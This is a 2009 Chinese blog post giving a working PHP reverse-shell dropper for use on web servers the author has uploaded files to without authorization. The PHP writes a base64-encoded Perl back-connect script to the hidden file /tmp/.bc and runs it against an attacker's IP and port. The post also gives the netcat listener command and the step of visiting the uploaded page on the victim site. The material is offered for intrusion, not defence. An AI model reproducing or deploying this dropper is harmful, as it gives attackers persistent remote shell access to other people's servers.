猥琐流之php反弹

作者:Sh@doM

遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。非常无奈,没想 到什么好的办法,后来灵光一闪。放一个php页面,里面 可以直接弹回来shell,何况在console下面操作比webshell方便的多,也不会出现超时之类的情况。
因为我不怎么懂php,于是就找了猥琐 的诺诺和小雨修改了一下代码,反弹代码是从phpspy2008里面提取的,但是不能直接用,需要修改成一个单独的php文件。上传之后,本地监听一个端 口,在代码里设置好反弹IP和端口,然后直接访问,就会弹回来一个shell。

声明,没啥技术含量,主要是用来方便。这样每次可以直接访问这个php页面,直接弹回来shell,不用做其他繁琐的操作,下面贴出来已经修改好的代码

  1. <?php  
  2.  
  3. function which($pr) {  
  4. $path = execute("which $pr");  
  5. return ($path ? $path : $pr);  
  6. }  
  7.  
  8. function execute($cfe) {  
  9. $res = '';  
  10. if ($cfe) {  
  11. if(function_exists('exec')) {  
  12. @exec($cfe,$res);  
  13. $res = join("\n",$res);  
  14. elseif(function_exists('shell_exec')) {  
  15. $res = @shell_exec($cfe);  
  16. elseif(function_exists('system')) {  
  17. @ob_start();  
  18. @system($cfe);  
  19. $res = @ob_get_contents();  
  20. @ob_end_clean();  
  21. elseif(function_exists('passthru')) {  
  22. @ob_start();  
  23. @passthru($cfe);  
  24. $res = @ob_get_contents();  
  25. @ob_end_clean();  
  26. elseif(@is_resource($f = @popen($cfe,"r"))) {  
  27. $res = '';  
  28. while(!@feof($f)) {  
  29. $res .= @fread($f,1024);  
  30. }  
  31. @pclose($f);  
  32. }  
  33. }  
  34. return $res;  
  35. }  
  36.  
  37. function cf($fname,$text){  
  38. if($fp=@fopen($fname,'w')) {  
  39. @fputs($fp,@base64_decode($text));  
  40. @fclose($fp);  
  41. }  
  42. }  
  43.  
  44. $yourip = "your IP";  
  45. $yourport = 'your port';  
  46. $usedb = array('perl'=>'perl','c'=>'c');  
  47.  
  48. $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".  
  49. "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".  
  50. "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".  
  51. "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".  
  52. "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".  
  53. "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".  
  54. "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";  
  55.  
  56. cf('/tmp/.bc',$back_connect);  
  57. $res = execute(which('perl')." /tmp/.bc $yourip $yourport &");  
  58.  
  59. ?> 

 

先在本地执行 nc -l -vv -p port 然后访问这个php页面 http://www.site.com/fuck.php 本地就会得到一个反弹的shell。

仅限猥琐流使用,如果有什么好的猥琐的方法,请不吝赐教

Posted on: 2009, January 15, 11:24 AM | Filed under: 技巧摘录 |
Tags:php

您可能会对以下文章感兴趣哦

Leave a comment

Your comment

Why not Login? Sign up now! »